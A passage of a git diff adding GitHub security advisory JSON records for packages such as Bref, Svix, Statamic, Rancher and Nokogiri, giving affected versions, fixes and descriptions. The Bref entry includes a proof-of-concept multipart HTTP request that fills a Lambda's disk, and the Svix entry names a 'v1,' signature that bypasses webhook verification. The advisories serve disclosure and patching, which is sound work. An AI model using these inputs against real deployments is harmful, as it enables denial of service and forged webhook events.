"github_reviewed_at": "2024-02-03T00:47:54Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-vh73-q3rw-qx7w/GHSA-vh73-q3rw-qx7w.json b/advisories/github-reviewed/2024/02/GHSA-vh73-q3rw-qx7w/GHSA-vh73-q3rw-qx7w.json new file mode 100644 index 0000000000000..dbbc49601b259 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-vh73-q3rw-qx7w/GHSA-vh73-q3rw-qx7w.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vh73-q3rw-qx7w", + "modified": "2024-02-05T23:06:56Z", + "published": "2024-02-05T21:30:31Z", + "aliases": [ + "CVE-2024-1052" + ], + "summary": "Boundary vulnerable to session hijacking through TLS certificate tampering", + "details": "Boundary and Boundary Enterprise (“Boundary”) is vulnerable to session hijacking through TLS certificate tampering. An attacker with privileges to enumerate active or pending sessions, obtain a private key pertaining to a session, and obtain a valid trust on first use (TOFU) token may craft a TLS certificate to hijack an active session and gain access to the underlying service or application.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/boundary" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.8.0" + }, + { + "fixed": "0.15.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1052" + }, + { + "type": "WEB", + "url": "https://discuss.hashicorp.com/t/hcsec-2024-02-boundary-vulnerable-to-session-hijacking-through-tls-certificate-tampering/62458" + }, + { + "type": "PACKAGE", + "url": "https://github.com/hashicorp/boundary" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T23:06:56Z", + "nvd_published_at": "2024-02-05T21:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-vjg6-93fv-qv64/GHSA-vjg6-93fv-qv64.json b/advisories/github-reviewed/2024/02/GHSA-vjg6-93fv-qv64/GHSA-vjg6-93fv-qv64.json new file mode 100644 index 0000000000000..67c2c045911c8 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-vjg6-93fv-qv64/GHSA-vjg6-93fv-qv64.json @@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vjg6-93fv-qv64", + "modified": "2024-02-03T00:03:09Z", + "published": "2024-02-03T00:03:09Z", + "aliases": [ + + ], + "summary": "Etcd auth Inaccurate logging of authentication attempts for users with CN-based auth only", + "details": "### Vulnerability type\nLogging\n\n### Detail\netcd users who have no password can authenticate only through a client certificate. When such users try to authenticate into etcd using the Authenticate endpoint, errors are logged with insufficient information regarding why the authentication failed, and may be misleading when auditing etcd logs.\n\n### References\nFind out more on this vulnerability in the [security audit report](https://github.com/etcd-io/etcd/blob/master/security/SECURITY_AUDIT.pdf)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Contact the [etcd security committee](https://github.com/etcd-io/etcd/blob/master/security/security-release-process.md#product-security-committee-psc)", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "go.etcd.io/etcd" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.4.0-rc.0" + }, + { + "fixed": "3.4.10" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.4.9" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "go.etcd.io/etcd" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.3.23" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/etcd-io/etcd/security/advisories/GHSA-vjg6-93fv-qv64" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-02-03T00:03:09Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-vqxq-hvxw-9mv9/GHSA-vqxq-hvxw-9mv9.json b/advisories/github-reviewed/2024/02/GHSA-vqxq-hvxw-9mv9/GHSA-vqxq-hvxw-9mv9.json new file mode 100644 index 0000000000000..537fc912c91c2 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-vqxq-hvxw-9mv9/GHSA-vqxq-hvxw-9mv9.json @@ -0,0 +1,81 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vqxq-hvxw-9mv9", + "modified": "2024-02-01T20:51:46Z", + "published": "2024-02-01T20:51:46Z", + "aliases": [ + "CVE-2024-24570" + ], + "summary": "Statmic CMS vulnerable to account takeover via XSS and password reset link", + "details": "### Impact\n\nHTML files crafted to look like jpg files are able to be uploaded, allowing for XSS.\n\nThis affects:\n\n- front-end forms with asset fields without any mime type validation\n- asset fields in the control panel\n- asset browser in the control panel\n\nAdditionally, if the XSS is crafted in a specific way, the \"copy password reset link\" feature may be exploited to gain access to a user's password reset token and gain access to their account. The authorized user is required to execute the XSS in order for the vulnerability to occur.\n\n### Patches\n\nIn versions 4.46.0 and 3.4.17, the XSS vulnerability has been patched, and the copy password reset link functionality has been disabled. (Users may still trigger password reset emails.)\n\n### Credits\n\nStatamic thanks Niklas Schilling (discovery, analysis, coordination) from the SEC Consult Vulnerability Lab (https://www.sec-consult.com/) for responsibly reporting the identified issues and working with us as we addressed them.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "statamic/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.00" + }, + { + "fixed": "4.46.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "statamic/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.4.17" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/statamic/cms/security/advisories/GHSA-vqxq-hvxw-9mv9" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24570" + }, + { + "type": "PACKAGE", + "url": "https://github.com/statamic/cms" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79", + "CWE-80" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T20:51:46Z", + "nvd_published_at": "2024-02-01T17:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-w275-m8cr-hf2v/GHSA-w275-m8cr-hf2v.json b/advisories/github-reviewed/2024/02/GHSA-w275-m8cr-hf2v/GHSA-w275-m8cr-hf2v.json new file mode 100644 index 0000000000000..c5cde7747820f --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-w275-m8cr-hf2v/GHSA-w275-m8cr-hf2v.json @@ -0,0 +1,118 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w275-m8cr-hf2v", + "modified": "2024-02-08T18:26:21Z", + "published": "2024-02-08T06:30:23Z", + "aliases": [ + "CVE-2024-25144" + ], + "summary": " Liferay Portal denial-of-service vulnerability", + "details": "The IFrame widget in Liferay Portal 7.2.0 through 7.4.3.26, and older unsupported versions, and Liferay DXP 7.4 before update 27, 7.3 before update 6, 7.2 before fix pack 19, and older unsupported versions does not check the URL of the IFrame, which allows remote authenticated users to cause a denial-of-service (DoS) via a self referencing IFrame.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.portal.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.2.0" + }, + { + "fixed": "7.4.3.27" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.dxp.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.2.0" + }, + { + "fixed": "7.2.10.fp19" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.dxp.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.3.0" + }, + { + "fixed": "7.3.10.u6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.dxp.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.4.0" + }, + { + "fixed": "7.4.13.u27" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25144" + }, + { + "type": "PACKAGE", + "url": "https://github.com/liferay/liferay-portal" + }, + { + "type": "WEB", + "url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25144" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-834" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T18:26:20Z", + "nvd_published_at": "2024-02-08T04:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-w277-wpqf-rcfv/GHSA-w277-wpqf-rcfv.json b/advisories/github-reviewed/2024/02/GHSA-w277-wpqf-rcfv/GHSA-w277-wpqf-rcfv.json new file mode 100644 index 0000000000000..a863191b7e3c3 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-w277-wpqf-rcfv/GHSA-w277-wpqf-rcfv.json @@ -0,0 +1,67 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w277-wpqf-rcfv", + "modified": "2024-02-06T20:30:14Z", + "published": "2024-02-06T20:30:14Z", + "aliases": [ + + ], + "summary": "Svix vulnerable to improper comparison of different-length signatures", + "details": "The `Webhook::verify` function incorrectly compared signatures of different lengths - the two signatures would only be compared up to the length of the shorter signature. This allowed an attacker to pass in `v1,` as the signature, which would always pass verification.\n", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "svix" + }, + "ecosystem_specific": { + "affected_functions": [ + "svix::webhooks::Webhook::verify" + ] + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.17.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/svix/svix-webhooks/pull/1190" + }, + { + "type": "WEB", + "url": "https://github.com/svix/svix-webhooks/commit/958821bd3b956d1436af65f70a0964d4ffb7daf6" + }, + { + "type": "PACKAGE", + "url": "https://github.com/svix/svix-webhooks" + }, + { + "type": "WEB", + "url": "https://rustsec.org/advisories/RUSTSEC-2024-0010.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-06T20:30:14Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-wgpq-p2hm-56v9/GHSA-wgpq-p2hm-56v9.json b/advisories/github-reviewed/2024/02/GHSA-wgpq-p2hm-56v9/GHSA-wgpq-p2hm-56v9.json new file mode 100644 index 0000000000000..485ff86916d34 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-wgpq-p2hm-56v9/GHSA-wgpq-p2hm-56v9.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wgpq-p2hm-56v9", + "modified": "2024-02-05T22:32:25Z", + "published": "2024-02-01T15:30:24Z", + "aliases": [ + "CVE-2024-1141" + ], + "summary": "glance-store logs s3 access keys", + "details": "A vulnerability was found in python-glance-store. The issue occurs when the package logs the access_key for the glance-store when the DEBUG log level is enabled.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "glance-store" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "4.6.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1141" + }, + { + "type": "WEB", + "url": "https://github.com/openstack/glance_store/commit/d6e531af4821c8466b1e9404f12f89f6216417f2" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2024-1141" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258836" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openstack/glance_store" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T22:32:25Z", + "nvd_published_at": "2024-02-01T15:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-wh5w-82f3-wrxh/GHSA-wh5w-82f3-wrxh.json b/advisories/github-reviewed/2024/02/GHSA-wh5w-82f3-wrxh/GHSA-wh5w-82f3-wrxh.json new file mode 100644 index 0000000000000..e2600e158621e --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-wh5w-82f3-wrxh/GHSA-wh5w-82f3-wrxh.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wh5w-82f3-wrxh", + "modified": "2024-02-07T18:21:05Z", + "published": "2024-02-07T17:34:11Z", + "aliases": [ + "CVE-2023-4771" + ], + "summary": "CKEditor cross-site scripting vulnerability in AJAX sample", + "details": "### Affected packages\nThe vulnerability has been discovered in the AJAX sample available at the `samples/old/ajax.html` file location. All integrators that use that sample in the production code can be affected.\n\n### Impact\n\nA potential vulnerability has been discovered in one of CKEditor's 4 samples that are shipped with production code. The vulnerability allowed to execute JavaScript code by abusing the AJAX sample. It affects all users using the CKEditor 4 at version < 4.24.0-lts where `samples/old/ajax.html` is used in a production environment.\n\n### Patches\nThe problem has been recognized and patched. The fix will be available in version 4.24.0-lts.\n\n### For more information\nEmail us at [security@cksource.com](mailto:security@cksource.com) if you have any questions or comments about this advisory.\n\n### Acknowledgements\nThe CKEditor 4 team would like to thank Rafael Pedrero and INCIBE ([original report](https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-cksource-ckeditor)) for recognizing and reporting this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "ckeditor4" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.24.0-lts" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-wh5w-82f3-wrxh" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4771" + }, + { + "type": "WEB", + "url": "https://github.com/ckeditor/ckeditor4/commit/8ed1a3c93d0ae5f49f4ecff5738ab8a2972194cb" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ckeditor/ckeditor4" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-cksource-ckeditor" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T17:34:11Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-wjxc-pjx9-4wvm/GHSA-wjxc-pjx9-4wvm.json b/advisories/github-reviewed/2024/02/GHSA-wjxc-pjx9-4wvm/GHSA-wjxc-pjx9-4wvm.json new file mode 100644 index 0000000000000..f733eb1374776 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-wjxc-pjx9-4wvm/GHSA-wjxc-pjx9-4wvm.json @@ -0,0 +1,53 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wjxc-pjx9-4wvm", + "modified": "2024-02-03T00:18:06Z", + "published": "2024-02-03T00:18:06Z", + "aliases": [ + + ], + "summary": "Nervos CKB Panic on malformed input", + "details": "### Impact\nCKB process will panic when received malformed p2p message because of snappy, which is used to compress network messages\n\n### References\nhttps://github.com/BurntSushi/rust-snappy/issues/29", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "ckb" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.34.2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.34.1" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/security/advisories/GHSA-wjxc-pjx9-4wvm" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-03T00:18:06Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-x4hh-frx8-98r5/GHSA-x4hh-frx8-98r5.json b/advisories/github-reviewed/2024/02/GHSA-x4hh-frx8-98r5/GHSA-x4hh-frx8-98r5.json new file mode 100644 index 0000000000000..1abffc11a616a --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-x4hh-frx8-98r5/GHSA-x4hh-frx8-98r5.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x4hh-frx8-98r5", + "modified": "2024-02-01T20:53:03Z", + "published": "2024-02-01T20:53:03Z", + "aliases": [ + "CVE-2024-24752" + ], + "summary": "Bref's Uploaded Files Not Deleted in Event-Driven Functions", + "details": "## Impacted Resources\n\nbref/src/Event/Http/Psr7Bridge.php:94-125\n\n## Description\n\nWhen Bref is used with the Event-Driven Function runtime and the handler is a `RequestHandlerInterface`, then the Lambda event is converted to a PSR7 object.\nDuring the conversion process, if the request is a MultiPart, each part is parsed and for each which contains a file, it is extracted and saved in `/tmp` with a random filename starting with `bref_upload_`.\n\nThe function implementing the logic follows:\n\n```php\nprivate static function parseBodyAndUploadedFiles(HttpRequestEvent $event): array\n{\n $bodyString = $event->getBody();\n $files = [];\n $parsedBody = null;\n $contentType = $event->getContentType();\n if ($contentType !== null && $event->getMethod() === 'POST') {\n if (str_starts_with($contentType, 'application/x-www-form-urlencoded')) {\n parse_str($bodyString, $parsedBody);\n } else {\n $document = new Part(\"Content-type: $contentType\\r\\n\\r\\n\" . $bodyString);\n if ($document->isMultiPart()) {\n $parsedBody = [];\n foreach ($document->getParts() as $part) {\n if ($part->isFile()) {\n $tmpPath = tempnam(sys_get_temp_dir(), 'bref_upload_');\n if ($tmpPath === false) {\n throw new RuntimeException('Unable to create a temporary directory');\n }\n file_put_contents($tmpPath, $part->getBody());\n $file = new UploadedFile($tmpPath, filesize($tmpPath), UPLOAD_ERR_OK, $part->getFileName(), $part->getMimeType());\n\n self::parseKeyAndInsertValueInArray($files, $part->getName(), $file);\n } else {\n self::parseKeyAndInsertValueInArray($parsedBody, $part->getName(), $part->getBody());\n }\n }\n }\n }\n }\n return [$files, $parsedBody];\n}\n```\n\nThe flow mimics what plain PHP does but it does not delete the temporary files when the request has been processed.\n\n## Impact\n\nAn attacker could fill the Lambda instance disk by performing multiple MultiPart requests containing files.\nThe attack has the following requirements and limitations:\n- The Lambda should use the Event-Driven Function runtime.\n- The Lambda should use the `RequestHandlerInterface` handler.\n- The Lambda should implement at least an endpoint accepting POST requests.\n- The attacker can send requests up to 6MB long, so multiple requests are required to fill the disk (the default Lambda disk size is 512MB, therefore with less than 100 requests the disk could be filled).\n\n## PoC\n\n1. Create a new Bref project.\n2. Create an `index.php` file with the following content:\n```php\n` placeholder with the deployed Lambda domain:\n```\nPOST /upload HTTP/2\nHost: \nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryQqDeSZSSvmn2rfjb\nContent-Length: 180\n\n------WebKitFormBoundaryQqDeSZSSvmn2rfjb\nContent-Disposition: form-data; name=\"a\"; filename=\"a.txt\"\nContent-Type: text/plain\n\ntest\n------WebKitFormBoundaryQqDeSZSSvmn2rfjb--\n```\n5. Notice that each time the request is sent the number of the uploaded temporary files on the disk increases.\n\n## Suggested Remediation\n\nDelete the temporary files after the request has been processed and the response have been generated.\n\n## References\n\n- https://cheatsheetseries.owasp.org/cheatsheets/Denial_of_Service_Cheat_Sheet.html", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "bref/bref" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.1.13" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/brefphp/bref/security/advisories/GHSA-x4hh-frx8-98r5" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24752" + }, + { + "type": "WEB", + "url": "https://github.com/brefphp/bref/commit/350788de12880b6fd64c4c318ba995388bec840e" + }, + { + "type": "PACKAGE", + "url": "https://github.com/brefphp/bref" + }, + { + "type": "WEB", + "url": "https://github.com/brefphp/bref/blob/2.1.12/src/Event/Http/Psr7Bridge.php#L94-L125" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T20:53:03Z", + "nvd_published_at": "2024-02-01T16:17:14Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-xc9x-jj77-9p9j/GHSA-xc9x-jj77-9p9j.json b/advisories/github-reviewed/2024/02/GHSA-xc9x-jj77-9p9j/GHSA-xc9x-jj77-9p9j.json new file mode 100644 index 0000000000000..12343e35adf61 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-xc9x-jj77-9p9j/GHSA-xc9x-jj77-9p9j.json @@ -0,0 +1,70 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xc9x-jj77-9p9j", + "modified": "2024-02-05T20:22:56Z", + "published": "2024-02-05T20:22:56Z", + "aliases": [ + + ], + "summary": "Nokogiri update packaged libxml2 to v2.12.5 to resolve CVE-2024-25062", + "details": "## Summary\n\nNokogiri v1.16.2 upgrades the version of its dependency libxml2 to [v2.12.5](https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.12.5).\n\nlibxml2 v2.12.5 addresses the following vulnerability:\n\n- CVE-2024-25062 / https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25062\n - described at https://gitlab.gnome.org/GNOME/libxml2/-/issues/604\n - patched by https://gitlab.gnome.org/GNOME/libxml2/-/commit/92721970\n\nPlease note that this advisory only applies to the CRuby implementation of Nokogiri `< 1.16.2`, and only if the _packaged_ libraries are being used. If you've overridden defaults at installation time to use _system_ libraries instead of packaged libraries, you should instead pay attention to your distro's `libxml2` release announcements.\n\n## Mitigation\n\nUpgrade to Nokogiri `>= 1.16.2`.\n\nUsers who are unable to upgrade Nokogiri may also choose a more complicated mitigation: compile and link Nokogiri against external libraries libxml2 `>= 2.12.5` which will also address these same issues.\n\n## Impact\n\nFrom the CVE description, this issue applies to the `xmlTextReader` module (which underlies `Nokogiri::XML::Reader`):\n\n> When using the XML Reader interface with DTD validation and XInclude expansion enabled, processing crafted XML documents can lead to an xmlValidatePopElement use-after-free.\n\n## Timeline\n\n- 2024-02-04 10:35 EST - this GHSA is drafted without complete details about when the upstream issue was introduced; a request is made of libxml2 maintainers for more detailed information\n- 2024-02-04 10:48 EST - updated GHSA to reflect libxml2 maintainers' confirmation of affected versions\n- 2024-02-04 11:54 EST - v1.16.2 published, this GHSA made public\n- 2024-02-05 10:18 EST - updated with MITRE link to the CVE information, and updated \"Impact\" section", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "RubyGems", + "name": "nokogiri" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.16.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-xc9x-jj77-9p9j" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25062" + }, + { + "type": "PACKAGE", + "url": "https://github.com/sparklemotion/nokogiri" + }, + { + "type": "WEB", + "url": "https://gitlab.gnome.org/GNOME/libxml2/-/commit/92721970" + }, + { + "type": "WEB", + "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/604" + }, + { + "type": "WEB", + "url": "https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.12.5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T20:22:56Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-xfj7-qf8w-2gcr/GHSA-xfj7-qf8w-2gcr.json b/advisories/github-reviewed/2024/02/GHSA-xfj7-qf8w-2gcr/GHSA-xfj7-qf8w-2gcr.json new file mode 100644 index 0000000000000..5e29594de6a34 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-xfj7-qf8w-2gcr/GHSA-xfj7-qf8w-2gcr.json @@ -0,0 +1,95 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xfj7-qf8w-2gcr", + "modified": "2024-02-08T18:44:25Z", + "published": "2024-02-08T18:44:25Z", + "aliases": [ + "CVE-2023-22649" + ], + "summary": "Rancher 'Audit Log' leaks sensitive information", + "details": "### Impact\n\nA vulnerability has been identified which may lead to sensitive data being leaked into Rancher's audit logs. [Rancher Audit Logging](https://ranchermanager.docs.rancher.com/how-to-guides/advanced-user-guides/enable-api-audit-log) is an opt-in feature, only deployments that have it enabled and have [AUDIT_LEVEL](https://ranchermanager.docs.rancher.com/how-to-guides/advanced-user-guides/enable-api-audit-log#audit-log-levels) set to `1 or above` are impacted by this issue.\n\nThe leaks might be caught in the audit logs upon these actions:\n\n- Creating cloud credentials or new authentication providers. It is crucial to note that **all** [authentication providers](https://ranchermanager.docs.rancher.com/pages-for-subheaders/authentication-config#external-vs-local-authentication) (such as AzureAD) and [cloud providers](https://ranchermanager.docs.rancher.com/pages-for-subheaders/set-up-cloud-providers) (such as Google) are impacted. \n- Downloading a kubeconfig file from a downstream or a local cluster.\n- Logging in/out from Rancher.\n\nThe affected data may include the following:\n\n- HTTP headers\n\nField | Location\n-- | --\nX-Api-Auth-Header | Request header\nX-Api-Set-Cookie-Header | Response header\nX-Amz-Security-Token | Request header\ncredentials | Request body\napplicationSecret | Request Body\noauthCredential | Request Body\nserviceAccountCredential | Request Body\nspKey | Request Body\nspCert | Request body\nspCert | Response body\ncertificate | Request body\nprivateKey | Request body\n \n- API Server calls returning `Secret` objects (including sub-types, such as `kubernetes.io/dockerconfigjson`).\n- Raw command lines used by agents to connect to the Rancher server which expose sensitive information (e.g. `register ... --token abc`).\n- `Kubeconfig` contents when the 'Download KubeConfig' feature is used in the Rancher UI.\n\nThe patched versions will redact the sensitive data, replacing it with `[redacted]`, making it safer for consumption. It is recommended that static secrets are rotated after the system is patched, to limit the potential impact of sensitive data being misused due to this vulnerability.\n\n**Note:**\n1. The severity of the vulnerability is intricately tied to the logging strategy employed. If logs are kept locally (default configuration), the impact is contained within the system, limiting the exposure.\nHowever, when logs are shipped to an external endpoint, the vulnerability's severity might increase, as resistance against leaks is contingent on the security measures implemented at the external log collector level.\n2. The final impact severity for confidentiality, integrity and availability is dependent on the permissions that the leaked credentials have on their own services.\n\n\n### Patches\nPatched versions include releases `2.6.14`, `2.7.10` and `2.8.2`.\n\n### Workarounds\nIf `AUDIT_LEVEL` `1 or above` is required and you cannot update to a patched Rancher version, ensure that the log is handled appropriately and it is not shared with other users or shipped into a log ingestion solution without the appropriate RBAC enforcement. Otherwise, disabling the Audit feature or decreasing it to the audit level `0`, mitigates the issue.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n- Reach out to the [SUSE Rancher Security team](https://github.com/rancher/rancher/security/policy) for security related inquiries.\n- Open an issue in the [Rancher](https://github.com/rancher/rancher/issues/new/choose) repository.\n- Verify with our [support matrix](https://www.suse.com/suse-rancher/support-matrix/all-supported-versions/) and [product support lifecycle](https://www.suse.com/lifecycle/).\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/rancher/rancher" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.6.0" + }, + { + "fixed": "2.6.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/rancher/rancher" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/rancher/rancher" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.2" + } + ] + } + 